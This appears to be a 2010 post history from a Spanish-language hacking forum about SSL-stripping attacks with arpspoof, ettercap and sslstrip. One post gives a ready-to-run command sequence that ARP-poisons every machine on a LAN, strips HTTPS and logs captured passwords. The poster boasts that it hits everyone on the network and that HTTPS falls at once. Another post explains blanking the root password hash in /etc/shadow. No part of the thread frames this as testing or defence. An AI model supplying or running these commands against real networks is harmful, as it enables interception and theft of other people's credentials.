Cita de: tragantras en 27 Septiembre 2010, 16:51 PM
claro, porque tu usarás otro sniffer, como el wireshark o algo así!
No mi bro... yo no uso otro sniffer.... has pruebas si quieres.... sólo iptables + arspoof + sslstrip
Saludos!
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Hacking / Re: Problemas Sslstrip
28 Septiembre 2010, 05:14 AMNo mi bro... yo no uso otro sniffer.... has pruebas si quieres.... sólo iptables + arspoof + sslstrip
Saludos!
#2
Hacking / Re: Problemas Sslstrip
26 Septiembre 2010, 22:55 PM
ok... ya entiendo el uso del ettercap en este post... pero bueno aun así no veo la necesidad de usar el ettercap.
Yo uso solamente el SSLStrip con el ArpSpoof y me funciona de maravilla. Las https caen enseguida
Yo uso solamente el SSLStrip con el ArpSpoof y me funciona de maravilla. Las https caen enseguida
#3
Hacking / Re: Problemas Sslstrip
26 Septiembre 2010, 22:23 PMCita de: tragantras en 26 Septiembre 2010, 21:36 PM
para hacer un mitmo sino como te va a enviar la victima los dateles? xD
mmmm..... pues mira que usando solo el arpspoof haces el MitM
o usando solo el ettercap haces tambien el MitM por eso digo que no veo la necesidad de mezclarlos...
o hay algo mas detrás??? explícame que esa es mi duda...
#4
Hacking / Re: Imposible Actualizar Metasploit BT4 R1
25 Septiembre 2010, 22:24 PM
Para actualizarlo, tan solo tendremos que ir a la carpeta de Metasploit (/pentest/exploits/
framework3/) y ejecutar la orden "svn update".
fuente: Revista Linux+.
bueno ya no es necesario ponernos como root porque en el BT ya estamos como root
framework3/) y ejecutar la orden "svn update".
fuente: Revista Linux+.
bueno ya no es necesario ponernos como root porque en el BT ya estamos como root
#5
Hacking / Re: Problemas Sslstrip
25 Septiembre 2010, 21:48 PM
El segundo problema que veo con el sslstrip. alguien me puede explicar porque usan ettercap con arpspoof????
porque yo no le veo el caso!!!!!!!!!!!!!!!!!!!!!!!!!!!
porque yo no le veo el caso!!!!!!!!!!!!!!!!!!!!!!!!!!!
#6
Hacking / Re: Ettercap+Sslstrip
25 Septiembre 2010, 21:45 PM
mejor prueba esto
pero si lo quieres hacer con ettercap puedes probar esto:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
ettercap -TqM arp // // -i eth0
sslstrip -w passwords
tail -f passwords
con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD
algo tarde pero pues a lo mejor a alguien le sirve... :p
pero si lo quieres hacer con ettercap puedes probar esto:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
ettercap -TqM arp // // -i eth0
sslstrip -w passwords
tail -f passwords
con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD
algo tarde pero pues a lo mejor a alguien le sirve... :p
#7
Hacking / Re: No recuerdo usuario ni pass backtrack 4
25 Septiembre 2010, 21:20 PM
Puedes usar un live cd de cualquier distro, simplemente montas la particion donde está instalado el sistema que no recuerdas la password y como ya te dijeron el archivo a editar es /etc/shadow ahi busca una linea que diga root: por lo regular es la primera y dejala de esta forma:
root::14788:0:99999:7:::
es decir, eliminar la contraseña cifrada.... y cuando te loggeas usa root y como pass nada
root::14788:0:99999:7:::
es decir, eliminar la contraseña cifrada.... y cuando te loggeas usa root y como pass nada
Páginas1